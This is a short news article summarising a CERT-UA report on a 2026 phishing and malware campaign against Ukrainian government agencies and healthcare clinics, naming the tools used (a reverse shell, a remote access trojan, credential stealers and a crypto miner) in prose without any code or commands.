- Ukraine’s CERT-UA exposed a malware campaign targeting government and healthcare bodies, culminating in a cryptocurrency miner being installed on infected systems.
- The attackers deployed a toolkit designed to steal sensitive data from Chromium browsers and WhatsApp, using tools like ChromElevator and ZAPiXDESK.
- The final payloads included remote access tools like AGINGFLY and RAVENSHELL, as well as the XMRig cryptocurrency mining software.
- The campaign leveraged compromised websites and AI-generated fake sites in phishing emails starting in March 2026.
A threat cluster tracked as UAC-0247 has been actively targeting Ukrainian government agencies and municipal healthcare clinics, leveraging sophisticated malware to steal data and mine cryptocurrency, according to a report from Ukraine’s Computer Emergencies Response Team (CERT-UA) detailing activity from March to April 2026. The attack chain begins with a phishing email disguised as a humanitarian aid proposal, which directs victims to a compromised or AI-generated fake website.
Consequently, the attack downloads a Windows Shortcut file that executes a remote HTML Application. This application displays a decoy form while secretly fetching a binary to inject malicious shellcode into a legitimate process like “runtimeBroker.exe.”
Meanwhile, the infection deploys multiple payloads for persistent access, including the RAVENSHELL reverse shell and the AGINGFLY remote access trojan. “At the same time, recent campaigns have recorded the use of a two-stage loader,” CERT-UA noted, describing its complex, encrypted structure.
The ultimate goal of the campaign is reconnaissance and data theft, facilitated by open-source tools. Attackers use tools like ZAPiXDESK to decrypt WhatsApp Web data and ChromElevator to bypass browser encryption for cookies and passwords.
Furthermore, the hackers utilize network scanners like RustScan and tunneling utilities such as Chisel for lateral movement. A final payload discovered in the attacks is XMRig, software designed to mine cryptocurrency on compromised machines.
However, the threat is not confined to government offices, as evidence suggests Ukrainian defense personnel were also targeted via malicious Signal messages. To defend against these attacks, CERT-UA recommends restricting the execution of scripts and specific legitimate system utilities often abused by the malware.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
